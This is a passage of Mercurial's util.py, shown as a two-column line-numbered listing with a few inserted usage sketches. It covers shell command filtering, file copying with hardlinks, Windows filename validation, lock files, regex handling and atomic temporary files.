957 962 if pycompat.sysplatform == 'OpenVMS' and code & 1:
958 963 code = 0
959 964 if code:
960 965 raise Abort(_("command '%s' failed: %s") %
961 966 (cmd, explainexit(code)))
962 967 return readfile(outname)
963 968 finally:
964 969 try:
965 970 if inname:
966 971 os.unlink(inname)
967 972 except OSError:
968 973 pass
969 974 try:
970 975 if outname:
971 976 os.unlink(outname)
972 977 except OSError:
973 978 pass
974 979
975 980 filtertable = {
976 981 'tempfile:': tempfilter,
977 982 'pipe:': pipefilter,
978 983 }
979 984
980 985 def filter(s, cmd):
981 986 "filter a string through a command that transforms its input to its output"
982 987 for name, fn in filtertable.iteritems():
983 988 if cmd.startswith(name):
984 989 return fn(s, cmd[len(name):].lstrip())
985 990 return pipefilter(s, cmd)
986 991
987 992 def binary(s):
988 993 """return true if a string is binary data"""
989 994 return bool(s and '\0' in s)
990 995
991 996 def increasingchunks(source, min=1024, max=65536):
992 997 '''return no less than min bytes per chunk while data remains,
993 998 doubling min after each chunk until it reaches max'''
994 999 def log2(x):
995 1000 if not x:
996 1001 return 0
997 1002 i = 0
998 1003 while x:
999 1004 x >>= 1
1000 1005 i += 1
1001 1006 return i - 1
1002 1007
1003 1008 buf = []
1004 1009 blen = 0
1005 1010 for chunk in source:
1006 1011 buf.append(chunk)
1007 1012 blen += len(chunk)
1008 1013 if blen >= min:
1009 1014 if min < max:
1010 1015 min = min << 1
1011 1016 nmin = 1 << log2(blen)
1012 1017 if nmin > min:
1013 1018 min = nmin
1014 1019 if min > max:
1015 1020 min = max
1016 1021 yield ''.join(buf)
1017 1022 blen = 0
1018 1023 buf = []
1019 1024 if buf:
1020 1025 yield ''.join(buf)
1021 1026
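# Usage sketch (editor's illustration): 500-byte input chunks are
# coalesced into growing output chunks, with min doubling after each
# yield until it reaches max.
source = (b'x' * 500 for _ in range(10))
[len(c) for c in increasingchunks(source, min=1024, max=4096)]
# -> [1500, 2500, 1000] for this input
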
1022 1027 Abort = error.Abort
1023 1028
1024 1029 def always(fn):
1025 1030 return True
1026 1031
1027 1032 def never(fn):
1028 1033 return False
1029 1034
1030 1035 def nogc(func):
1031 1036 """disable garbage collector
1032 1037
1033 1038 Python's garbage collector triggers a GC each time a certain number of
1034 1039 container objects (the number being defined by gc.get_threshold()) are
1035 1040 allocated even when marked not to be tracked by the collector. Tracking has
1036 1041 no effect on when GCs are triggered, only on what objects the GC looks
1037 1042 into. As a workaround, disable GC while building complex (huge)
1038 1043 containers.
1039 1044
1040 1045 This garbage collector issue has been fixed in 2.7, but it still affects
1041 1046 CPython's performance.
1042 1047 """
1043 1048 def wrapper(*args, **kwargs):
1044 1049 gcenabled = gc.isenabled()
1045 1050 gc.disable()
1046 1051 try:
1047 1052 return func(*args, **kwargs)
1048 1053 finally:
1049 1054 if gcenabled:
1050 1055 gc.enable()
1051 1056 return wrapper
1052 1057
1053 1058 if pycompat.ispypy:
1054 1059 # PyPy runs slower with gc disabled
1055 1060 nogc = lambda x: x
1056 1061
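# Usage sketch (editor's illustration): pausing the collector while
# building a huge container; on PyPy the decorator is a no-op.
@nogc
def buildmap(items):
    return dict((i, [i]) for i in items)   # many container allocations
buildmap(range(100000))
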
1057 1062 def pathto(root, n1, n2):
1058 1063 '''return the relative path from one place to another.
1059 1064 root should use os.sep to separate directories
1060 1065 n1 should use os.sep to separate directories
1061 1066 n2 should use "/" to separate directories
1062 1067 returns an os.sep-separated path.
1063 1068
1064 1069 If n1 is a relative path, it's assumed it's
1065 1070 relative to root.
1066 1071 n2 should always be relative to root.
1067 1072 '''
1068 1073 if not n1:
1069 1074 return localpath(n2)
1070 1075 if os.path.isabs(n1):
1071 1076 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1072 1077 return os.path.join(root, localpath(n2))
1073 1078 n2 = '/'.join((pconvert(root), n2))
1074 1079 a, b = splitpath(n1), n2.split('/')
1075 1080 a.reverse()
1076 1081 b.reverse()
1077 1082 while a and b and a[-1] == b[-1]:
1078 1083 a.pop()
1079 1084 b.pop()
1080 1085 b.reverse()
1081 1086 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082 1087
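# Usage sketch (editor's illustration): relative navigation between two
# root-relative paths (result shown for a POSIX os.sep).
pathto(b'/repo', b'a/b', b'a/c/d')   # -> '../c/d'
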
1083 1088 def mainfrozen():
1084 1089 """return True if we are a frozen executable.
1085 1090
1086 1091 The code supports py2exe (most common, Windows only) and tools/freeze
1087 1092 (portable, not much used).
1088 1093 """
1089 1094 return (safehasattr(sys, "frozen") or # new py2exe
1090 1095 safehasattr(sys, "importers") or # old py2exe
1091 1096 imp.is_frozen(u"__main__")) # tools/freeze
1092 1097
1093 1098 # the location of data files matching the source code
1094 1099 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1095 1100 # executable version (py2exe) doesn't support __file__
1096 1101 datapath = os.path.dirname(pycompat.sysexecutable)
1097 1102 else:
1098 1103 datapath = os.path.dirname(pycompat.fsencode(__file__))
1099 1104
1100 1105 i18n.setdatapath(datapath)
1101 1106
1102 1107 _hgexecutable = None
1103 1108
1104 1109 def hgexecutable():
1105 1110 """return location of the 'hg' executable.
1106 1111
1107 1112 Defaults to $HG or 'hg' in the search path.
1108 1113 """
1109 1114 if _hgexecutable is None:
1110 1115 hg = encoding.environ.get('HG')
1111 1116 mainmod = sys.modules[pycompat.sysstr('__main__')]
1112 1117 if hg:
1113 1118 _sethgexecutable(hg)
1114 1119 elif mainfrozen():
1115 1120 if getattr(sys, 'frozen', None) == 'macosx_app':
1116 1121 # Env variable set by py2app
1117 1122 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1118 1123 else:
1119 1124 _sethgexecutable(pycompat.sysexecutable)
1120 1125 elif (os.path.basename(
1121 1126 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1122 1127 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1123 1128 else:
1124 1129 exe = findexe('hg') or os.path.basename(sys.argv[0])
1125 1130 _sethgexecutable(exe)
1126 1131 return _hgexecutable
1127 1132
1128 1133 def _sethgexecutable(path):
1129 1134 """set location of the 'hg' executable"""
1130 1135 global _hgexecutable
1131 1136 _hgexecutable = path
1132 1137
1133 1138 def _isstdout(f):
1134 1139 fileno = getattr(f, 'fileno', None)
1135 1140 return fileno and fileno() == sys.__stdout__.fileno()
1136 1141
1137 1142 def shellenviron(environ=None):
1138 1143 """return environ with optional override, useful for shelling out"""
1139 1144 def py2shell(val):
1140 1145 'convert python object into string that is useful to shell'
1141 1146 if val is None or val is False:
1142 1147 return '0'
1143 1148 if val is True:
1144 1149 return '1'
1145 1150 return str(val)
1146 1151 env = dict(encoding.environ)
1147 1152 if environ:
1148 1153 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1149 1154 env['HG'] = hgexecutable()
1150 1155 return env
1151 1156
1152 1157 def system(cmd, environ=None, cwd=None, out=None):
1153 1158 '''enhanced shell command execution.
1154 1159 run with the environment possibly modified, possibly in a different dir.
1155 1160
1156 1161 if out is specified, it is assumed to be a file-like object that has a
1157 1162 write() method. stdout and stderr will be redirected to out.'''
1158 1163 try:
1159 1164 stdout.flush()
1160 1165 except Exception:
1161 1166 pass
1162 1167 cmd = quotecommand(cmd)
1163 1168 env = shellenviron(environ)
1164 1169 if out is None or _isstdout(out):
1165 1170 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1166 1171 env=env, cwd=cwd)
1167 1172 else:
1168 1173 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1169 1174 env=env, cwd=cwd, stdout=subprocess.PIPE,
1170 1175 stderr=subprocess.STDOUT)
1171 1176 for line in iter(proc.stdout.readline, ''):
1172 1177 out.write(line)
1173 1178 proc.wait()
1174 1179 rc = proc.returncode
1175 1180 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1176 1181 rc = 0
1177 1182 return rc
1178 1183
1179 1184 def checksignature(func):
1180 1185 '''wrap a function with code to check for calling errors'''
1181 1186 def check(*args, **kwargs):
1182 1187 try:
1183 1188 return func(*args, **kwargs)
1184 1189 except TypeError:
1185 1190 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1186 1191 raise error.SignatureError
1187 1192 raise
1188 1193
1189 1194 return check
1190 1195
1191 1196 # a whitelist of known filesystems where hardlinks work reliably
1192 1197 _hardlinkfswhitelist = {
1193 1198 'btrfs',
1194 1199 'ext2',
1195 1200 'ext3',
1196 1201 'ext4',
1197 1202 'hfs',
1198 1203 'jfs',
1199 1204 'reiserfs',
1200 1205 'tmpfs',
1201 1206 'ufs',
1202 1207 'xfs',
1203 1208 'zfs',
1204 1209 }
1205 1210
1206 1211 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1207 1212 '''copy a file, preserving mode and optionally other stat info like
1208 1213 atime/mtime
1209 1214
1210 1215 The checkambig argument is used with filestat, and is useful only if the
1211 1216 destination file is guarded by a lock (e.g. repo.lock or
1212 1217 repo.wlock).
1213 1218
1214 1219 copystat and checkambig should be mutually exclusive.
1215 1220 '''
1216 1221 assert not (copystat and checkambig)
1217 1222 oldstat = None
1218 1223 if os.path.lexists(dest):
1219 1224 if checkambig:
1220 1225 oldstat = checkambig and filestat.frompath(dest)
1221 1226 unlink(dest)
1222 1227 if hardlink:
1223 1228 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1224 1229 # unless we are confident that dest is on a whitelisted filesystem.
1225 1230 try:
1226 1231 fstype = getfstype(os.path.dirname(dest))
1227 1232 except OSError:
1228 1233 fstype = None
1229 1234 if fstype not in _hardlinkfswhitelist:
1230 1235 hardlink = False
1231 1236 if hardlink:
1232 1237 try:
1233 1238 oslink(src, dest)
1234 1239 return
1235 1240 except (IOError, OSError):
1236 1241 pass # fall back to normal copy
1237 1242 if os.path.islink(src):
1238 1243 os.symlink(os.readlink(src), dest)
1239 1244 # copytime is ignored for symlinks, but in general copytime isn't needed
1240 1245 # for them anyway
1241 1246 else:
1242 1247 try:
1243 1248 shutil.copyfile(src, dest)
1244 1249 if copystat:
1245 1250 # copystat also copies mode
1246 1251 shutil.copystat(src, dest)
1247 1252 else:
1248 1253 shutil.copymode(src, dest)
1249 1254 if oldstat and oldstat.stat:
1250 1255 newstat = filestat.frompath(dest)
1251 1256 if newstat.isambig(oldstat):
1252 1257 # stat of copied file is ambiguous to original one
1253 1258 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1254 1259 os.utime(dest, (advanced, advanced))
1255 1260 except shutil.Error as inst:
1256 1261 raise Abort(str(inst))
1257 1262
1258 1263 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1259 1264 """Copy a directory tree using hardlinks if possible."""
1260 1265 num = 0
1261 1266
1262 1267 gettopic = lambda: hardlink and _('linking') or _('copying')
1263 1268
1264 1269 if os.path.isdir(src):
1265 1270 if hardlink is None:
1266 1271 hardlink = (os.stat(src).st_dev ==
1267 1272 os.stat(os.path.dirname(dst)).st_dev)
1268 1273 topic = gettopic()
1269 1274 os.mkdir(dst)
1270 1275 for name, kind in listdir(src):
1271 1276 srcname = os.path.join(src, name)
1272 1277 dstname = os.path.join(dst, name)
1273 1278 def nprog(t, pos):
1274 1279 if pos is not None:
1275 1280 return progress(t, pos + num)
1276 1281 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1277 1282 num += n
1278 1283 else:
1279 1284 if hardlink is None:
1280 1285 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1281 1286 os.stat(os.path.dirname(dst)).st_dev)
1282 1287 topic = gettopic()
1283 1288
1284 1289 if hardlink:
1285 1290 try:
1286 1291 oslink(src, dst)
1287 1292 except (IOError, OSError):
1288 1293 hardlink = False
1289 1294 shutil.copy(src, dst)
1290 1295 else:
1291 1296 shutil.copy(src, dst)
1292 1297 num += 1
1293 1298 progress(topic, num)
1294 1299 progress(topic, None)
1295 1300
1296 1301 return hardlink, num
1297 1302
1298 1303 _winreservednames = {
1299 1304 'con', 'prn', 'aux', 'nul',
1300 1305 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 1306 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 1307 }
1303 1308 _winreservedchars = ':*?"<>|'
1304 1309 def checkwinfilename(path):
1305 1310 r'''Check that the base-relative path is a valid filename on Windows.
1306 1311 Returns None if the path is ok, or a UI string describing the problem.
1307 1312
1308 1313 >>> checkwinfilename(b"just/a/normal/path")
1309 1314 >>> checkwinfilename(b"foo/bar/con.xml")
1310 1315 "filename contains 'con', which is reserved on Windows"
1311 1316 >>> checkwinfilename(b"foo/con.xml/bar")
1312 1317 "filename contains 'con', which is reserved on Windows"
1313 1318 >>> checkwinfilename(b"foo/bar/xml.con")
1314 1319 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1315 1320 "filename contains 'AUX', which is reserved on Windows"
1316 1321 >>> checkwinfilename(b"foo/bar/bla:.txt")
1317 1322 "filename contains ':', which is reserved on Windows"
1318 1323 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1319 1324 "filename contains '\\x07', which is invalid on Windows"
1320 1325 >>> checkwinfilename(b"foo/bar/bla ")
1321 1326 "filename ends with ' ', which is not allowed on Windows"
1322 1327 >>> checkwinfilename(b"../bar")
1323 1328 >>> checkwinfilename(b"foo\\")
1324 1329 "filename ends with '\\', which is invalid on Windows"
1325 1330 >>> checkwinfilename(b"foo\\/bar")
1326 1331 "directory name ends with '\\', which is invalid on Windows"
1327 1332 '''
1328 1333 if path.endswith('\\'):
1329 1334 return _("filename ends with '\\', which is invalid on Windows")
1330 1335 if '\\/' in path:
1331 1336 return _("directory name ends with '\\', which is invalid on Windows")
1332 1337 for n in path.replace('\\', '/').split('/'):
1333 1338 if not n:
1334 1339 continue
1335 1340 for c in _filenamebytestr(n):
1336 1341 if c in _winreservedchars:
1337 1342 return _("filename contains '%s', which is reserved "
1338 1343 "on Windows") % c
1339 1344 if ord(c) <= 31:
1340 1345 return _("filename contains '%s', which is invalid "
1341 1346 "on Windows") % escapestr(c)
1342 1347 base = n.split('.')[0]
1343 1348 if base and base.lower() in _winreservednames:
1344 1349 return _("filename contains '%s', which is reserved "
1345 1350 "on Windows") % base
1346 1351 t = n[-1:]
1347 1352 if t in '. ' and n not in '..':
1348 1353 return _("filename ends with '%s', which is not allowed "
1349 1354 "on Windows") % t
1350 1355
1351 1356 if pycompat.iswindows:
1352 1357 checkosfilename = checkwinfilename
1353 1358 timer = time.clock
1354 1359 else:
1355 1360 checkosfilename = platform.checkosfilename
1356 1361 timer = time.time
1357 1362
1358 1363 if safehasattr(time, "perf_counter"):
1359 1364 timer = time.perf_counter
1360 1365
1361 1366 def makelock(info, pathname):
1362 1367 try:
1363 1368 return os.symlink(info, pathname)
1364 1369 except OSError as why:
1365 1370 if why.errno == errno.EEXIST:
1366 1371 raise
1367 1372 except AttributeError: # no symlink in os
1368 1373 pass
1369 1374
1370 1375 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1371 1376 os.write(ld, info)
1372 1377 os.close(ld)
1373 1378
1374 1379 def readlock(pathname):
1375 1380 try:
1376 1381 return os.readlink(pathname)
1377 1382 except OSError as why:
1378 1383 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1379 1384 raise
1380 1385 except AttributeError: # no symlink in os
1381 1386 pass
1382 1387 fp = posixfile(pathname)
1383 1388 r = fp.read()
1384 1389 fp.close()
1385 1390 return r
1386 1391
1387 1392 def fstat(fp):
1388 1393 '''stat file object that may not have fileno method.'''
1389 1394 try:
1390 1395 return os.fstat(fp.fileno())
1391 1396 except AttributeError:
1392 1397 return os.stat(fp.name)
1393 1398
1394 1399 # File system features
1395 1400
1396 1401 def fscasesensitive(path):
1397 1402 """
1398 1403 Return true if the given path is on a case-sensitive filesystem
1399 1404
1400 1405 Requires a path (like /foo/.hg) ending with a foldable final
1401 1406 directory component.
1402 1407 """
1403 1408 s1 = os.lstat(path)
1404 1409 d, b = os.path.split(path)
1405 1410 b2 = b.upper()
1406 1411 if b == b2:
1407 1412 b2 = b.lower()
1408 1413 if b == b2:
1409 1414 return True # no evidence against case sensitivity
1410 1415 p2 = os.path.join(d, b2)
1411 1416 try:
1412 1417 s2 = os.lstat(p2)
1413 1418 if s2 == s1:
1414 1419 return False
1415 1420 return True
1416 1421 except OSError:
1417 1422 return True
1418 1423
1419 1424 try:
1420 1425 import re2
1421 1426 _re2 = None
1422 1427 except ImportError:
1423 1428 _re2 = False
1424 1429
1425 1430 class _re(object):
1426 1431 def _checkre2(self):
1427 1432 global _re2
1428 1433 try:
1429 1434 # check if match works, see issue3964
1430 1435 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1431 1436 except ImportError:
1432 1437 _re2 = False
1433 1438
1434 1439 def compile(self, pat, flags=0):
1435 1440 '''Compile a regular expression, using re2 if possible
1436 1441
1437 1442 For best performance, use only re2-compatible regexp features. The
1438 1443 only flags from the re module that are re2-compatible are
1439 1444 IGNORECASE and MULTILINE.'''
1440 1445 if _re2 is None:
1441 1446 self._checkre2()
1442 1447 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1443 1448 if flags & remod.IGNORECASE:
1444 1449 pat = '(?i)' + pat
1445 1450 if flags & remod.MULTILINE:
1446 1451 pat = '(?m)' + pat
1447 1452 try:
1448 1453 return re2.compile(pat)
1449 1454 except re2.error:
1450 1455 pass
1451 1456 return remod.compile(pat, flags)
1452 1457
1453 1458 @propertycache
1454 1459 def escape(self):
1455 1460 '''Return the version of escape corresponding to self.compile.
1456 1461
1457 1462 This is imperfect because whether re2 or re is used for a particular
1458 1463 function depends on the flags, etc, but it's the best we can do.
1459 1464 '''
1460 1465 global _re2
1461 1466 if _re2 is None:
1462 1467 self._checkre2()
1463 1468 if _re2:
1464 1469 return re2.escape
1465 1470 else:
1466 1471 return remod.escape
1467 1472
1468 1473 re = _re()
1469 1474
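# Usage sketch (editor's illustration): util's re wrapper transparently
# prefers re2 when it is importable and the flags are compatible, and
# otherwise falls back to the stdlib re module.
pat = re.compile(br'[a-z]+', remod.IGNORECASE)
bool(pat.match(b'Hello'))   # True with either engine
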
1470 1475 _fspathcache = {}
1471 1476 def fspath(name, root):
1472 1477 '''Get name in the case stored in the filesystem
1473 1478
1474 1479 The name should be relative to root, and be normcase-ed for efficiency.
1475 1480
1476 1481 Note that this function is unnecessary, and should not be
1477 1482 called, for case-sensitive filesystems (simply because it's expensive).
1478 1483
1479 1484 The root should be normcase-ed, too.
1480 1485 '''
1481 1486 def _makefspathcacheentry(dir):
1482 1487 return dict((normcase(n), n) for n in os.listdir(dir))
1483 1488
1484 1489 seps = pycompat.ossep
1485 1490 if pycompat.osaltsep:
1486 1491 seps = seps + pycompat.osaltsep
1487 1492 # Protect backslashes. This gets silly very quickly.
1488 1493 seps.replace('\\','\\\\')
1489 1494 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1490 1495 dir = os.path.normpath(root)
1491 1496 result = []
1492 1497 for part, sep in pattern.findall(name):
1493 1498 if sep:
1494 1499 result.append(sep)
1495 1500 continue
1496 1501
1497 1502 if dir not in _fspathcache:
1498 1503 _fspathcache[dir] = _makefspathcacheentry(dir)
1499 1504 contents = _fspathcache[dir]
1500 1505
1501 1506 found = contents.get(part)
1502 1507 if not found:
1503 1508 # retry "once per directory" per "dirstate.walk" which
1504 1509 # may take place for each patch of "hg qpush", for example
1505 1510 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1506 1511 found = contents.get(part)
1507 1512
1508 1513 result.append(found or part)
1509 1514 dir = os.path.join(dir, part)
1510 1515
1511 1516 return ''.join(result)
1512 1517
1513 1518 def getfstype(dirpath):
1514 1519 '''Get the filesystem type name from a directory (best-effort)
1515 1520
1516 1521 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1517 1522 '''
1518 1523 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1519 1524
1520 1525 def checknlink(testfile):
1521 1526 '''check whether hardlink count reporting works properly'''
1522 1527
1523 1528 # testfile may be open, so we need a separate file for checking to
1524 1529 # work around issue2543 (or testfile may get lost on Samba shares)
1525 1530 f1, f2, fp = None, None, None
1526 1531 try:
1527 1532 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1528 1533 suffix='1~', dir=os.path.dirname(testfile))
1529 1534 os.close(fd)
1530 1535 f2 = '%s2~' % f1[:-2]
1531 1536
1532 1537 oslink(f1, f2)
1533 1538 # nlinks() may behave differently for files on Windows shares if
1534 1539 # the file is open.
1535 1540 fp = posixfile(f2)
1536 1541 return nlinks(f2) > 1
1537 1542 except OSError:
1538 1543 return False
1539 1544 finally:
1540 1545 if fp is not None:
1541 1546 fp.close()
1542 1547 for f in (f1, f2):
1543 1548 try:
1544 1549 if f is not None:
1545 1550 os.unlink(f)
1546 1551 except OSError:
1547 1552 pass
1548 1553
1549 1554 def endswithsep(path):
1550 1555 '''Check path ends with os.sep or os.altsep.'''
1551 1556 return (path.endswith(pycompat.ossep)
1552 1557 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1553 1558
1554 1559 def splitpath(path):
1555 1560 '''Split path by os.sep.
1556 1561 Note that this function does not use os.altsep because it is
1557 1562 an alternative to a simple "xxx.split(os.sep)".
1558 1563 It is recommended to use os.path.normpath() before using this
1559 1564 function if needed.'''
1560 1565 return path.split(pycompat.ossep)
1561 1566
1562 1567 def gui():
1563 1568 '''Are we running in a GUI?'''
1564 1569 if pycompat.isdarwin:
1565 1570 if 'SSH_CONNECTION' in encoding.environ:
1566 1571 # handle SSH access to a box where the user is logged in
1567 1572 return False
1568 1573 elif getattr(osutil, 'isgui', None):
1569 1574 # check if a CoreGraphics session is available
1570 1575 return osutil.isgui()
1571 1576 else:
1572 1577 # pure build; use a safe default
1573 1578 return True
1574 1579 else:
1575 1580 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1576 1581
1577 1582 def mktempcopy(name, emptyok=False, createmode=None):
1578 1583 """Create a temporary file with the same contents from name
1579 1584
1580 1585 The permission bits are copied from the original file.
1581 1586
1582 1587 If the temporary file is going to be truncated immediately, you
1583 1588 can use emptyok=True as an optimization.
1584 1589
1585 1590 Returns the name of the temporary file.
1586 1591 """
1587 1592 d, fn = os.path.split(name)
1588 1593 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1589 1594 os.close(fd)
1590 1595 # Temporary files are created with mode 0600, which is usually not
1591 1596 # what we want. If the original file already exists, just copy
1592 1597 # its mode. Otherwise, manually obey umask.
1593 1598 copymode(name, temp, createmode)
1594 1599 if emptyok:
1595 1600 return temp
1596 1601 try:
1597 1602 try:
1598 1603 ifp = posixfile(name, "rb")
1599 1604 except IOError as inst:
1600 1605 if inst.errno == errno.ENOENT:
1601 1606 return temp
1602 1607 if not getattr(inst, 'filename', None):
1603 1608 inst.filename = name
1604 1609 raise
1605 1610 ofp = posixfile(temp, "wb")
1606 1611 for chunk in filechunkiter(ifp):
1607 1612 ofp.write(chunk)
1608 1613 ifp.close()
1609 1614 ofp.close()
1610 1615 except: # re-raises
1611 1616 try:
1612 1617 os.unlink(temp)
1613 1618 except OSError:
1614 1619 pass
1615 1620 raise
1616 1621 return temp
1617 1622
1618 1623 class filestat(object):
1619 1624 """help to exactly detect change of a file
1620 1625
1621 1626 'stat' attribute is result of 'os.stat()' if specified 'path'
1622 1627 exists. Otherwise, it is None. This can avoid preparative
1623 1628 'exists()' examination on client side of this class.
1624 1629 """
1625 1630 def __init__(self, stat):
1626 1631 self.stat = stat
1627 1632
1628 1633 @classmethod
1629 1634 def frompath(cls, path):
1630 1635 try:
1631 1636 stat = os.stat(path)
1632 1637 except OSError as err:
1633 1638 if err.errno != errno.ENOENT:
1634 1639 raise
1635 1640 stat = None
1636 1641 return cls(stat)
1637 1642
1638 1643 @classmethod
1639 1644 def fromfp(cls, fp):
1640 1645 stat = os.fstat(fp.fileno())
1641 1646 return cls(stat)
1642 1647
1643 1648 __hash__ = object.__hash__
1644 1649
1645 1650 def __eq__(self, old):
1646 1651 try:
1647 1652 # if ambiguity between stat of new and old file is
1648 1653 # avoided, comparison of size, ctime and mtime is enough
1649 1654 # to exactly detect change of a file regardless of platform
1650 1655 return (self.stat.st_size == old.stat.st_size and
1651 1656 self.stat.st_ctime == old.stat.st_ctime and
1652 1657 self.stat.st_mtime == old.stat.st_mtime)
1653 1658 except AttributeError:
1654 1659 pass
1655 1660 try:
1656 1661 return self.stat is None and old.stat is None
1657 1662 except AttributeError:
1658 1663 return False
1659 1664
1660 1665 def isambig(self, old):
1661 1666 """Examine whether new (= self) stat is ambiguous against old one
1662 1667
1663 1668 "S[N]" below means stat of a file at N-th change:
1664 1669
1665 1670 - S[n-1].ctime < S[n].ctime: can detect change of a file
1666 1671 - S[n-1].ctime == S[n].ctime
1667 1672 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1668 1673 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1669 1674 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1670 1675 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1671 1676
1672 1677 Case (*2) above means that a file was changed two or more times
1673 1678 within the same second (= S[n-1].ctime), so comparing timestamps
1674 1679 is ambiguous.
1675 1680
1676 1681 The basic idea for avoiding such ambiguity is "advance mtime by 1
1677 1682 sec, if the timestamp is ambiguous".
1678 1683
1679 1684 But advancing mtime only in case (*2) doesn't work as
1680 1685 expected, because a naturally advanced S[n].mtime in case (*1)
1681 1686 might be equal to a manually advanced S[n-1 or earlier].mtime.
1682 1687
1683 1688 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1684 1689 treated as ambiguous regardless of mtime, to avoid being misled
1685 1690 by collisions between such mtimes.
1686 1691
1687 1692 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1688 1693 S[n].mtime", even if the size of the file hasn't changed.
1689 1694 """
1690 1695 try:
1691 1696 return (self.stat.st_ctime == old.stat.st_ctime)
1692 1697 except AttributeError:
1693 1698 return False
1694 1699
1695 1700 def avoidambig(self, path, old):
1696 1701 """Change file stat of specified path to avoid ambiguity
1697 1702
1698 1703 'old' should be previous filestat of 'path'.
1699 1704
1700 1705 Avoiding ambiguity is skipped if the process doesn't have
1701 1706 appropriate privileges for 'path'; this returns False in that
1702 1707 case.
1703 1708
1704 1709 Otherwise, this returns True, as "ambiguity is avoided".
1705 1710 """
1706 1711 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 1712 try:
1708 1713 os.utime(path, (advanced, advanced))
1709 1714 except OSError as inst:
1710 1715 if inst.errno == errno.EPERM:
1711 1716 # utime() on the file created by another user causes EPERM,
1712 1717 # if a process doesn't have appropriate privileges
1713 1718 return False
1714 1719 raise
1715 1720 return True
1716 1721
1717 1722 def __ne__(self, other):
1718 1723 return not self == other
1719 1724
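# A usage sketch (editor's addition, not part of the original change):
# callers typically snapshot filestat around a rewrite and repair any
# timestamp ambiguity afterwards; 'path' is a hypothetical bytes filename.
#
#   >>> old = filestat.frompath(path)
#   >>> # ... 'path' is rewritten here, under the repo lock ...
#   >>> new = filestat.frompath(path)
#   >>> if new.isambig(old):
#   ...     new.avoidambig(path, old)  # advance mtime by 1 sec so later
#   ...                                # size/ctime/mtime comparisons differ
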
1720 1725 class atomictempfile(object):
1721 1726 '''writable file object that atomically updates a file
1722 1727
1723 1728 All writes will go to a temporary copy of the original file. Call
1724 1729 close() when you are done writing, and atomictempfile will rename
1725 1730 the temporary copy to the original name, making the changes
1726 1731 visible. If the object is destroyed without being closed, all your
1727 1732 writes are discarded.
1728 1733
1729 1734 The checkambig constructor argument is used together with filestat,
1730 1735 and is useful only if the target file is guarded by a lock
1731 1736 (e.g. repo.lock or repo.wlock).
1732 1737 '''
1733 1738 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1734 1739 self.__name = name # permanent name
1735 1740 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1736 1741 createmode=createmode)
1737 1742 self._fp = posixfile(self._tempname, mode)
1738 1743 self._checkambig = checkambig
1739 1744
1740 1745 # delegated methods
1741 1746 self.read = self._fp.read
1742 1747 self.write = self._fp.write
1743 1748 self.seek = self._fp.seek
1744 1749 self.tell = self._fp.tell
1745 1750 self.fileno = self._fp.fileno
1746 1751
1747 1752 def close(self):
1748 1753 if not self._fp.closed:
1749 1754 self._fp.close()
1750 1755 filename = localpath(self.__name)
1751 1756 oldstat = self._checkambig and filestat.frompath(filename)
1752 1757 if oldstat and oldstat.stat:
1753 1758 rename(self._tempname, filename)
1754 1759 newstat = filestat.frompath(filename)
1755 1760 if newstat.isambig(oldstat):
1756 1761 # stat of changed file is ambiguous to original one
1757 1762 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1758 1763 os.utime(filename, (advanced, advanced))
1759 1764 else:
1760 1765 rename(self._tempname, filename)
1761 1766
1762 1767 def discard(self):
1763 1768 if not self._fp.closed:
1764 1769 try:
1765 1770 os.unlink(self._tempname)
1766 1771 except OSError:
1767 1772 pass
1768 1773 self._fp.close()
1769 1774
1770 1775 def __del__(self):
1771 1776 if safehasattr(self, '_fp'): # constructor actually did something
1772 1777 self.discard()
1773 1778
1774 1779 def __enter__(self):
1775 1780 return self
1776 1781
1777 1782 def __exit__(self, exctype, excvalue, traceback):
1778 1783 if exctype is not None:
1779 1784 self.discard()
1780 1785 else:
1781 1786 self.close()
1782 1787
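# A usage sketch (editor's addition): atomictempfile as a context manager.
# On a clean exit the temporary copy is renamed over the target; on an
# exception it is discarded and the target stays untouched. The filename
# is hypothetical.
#
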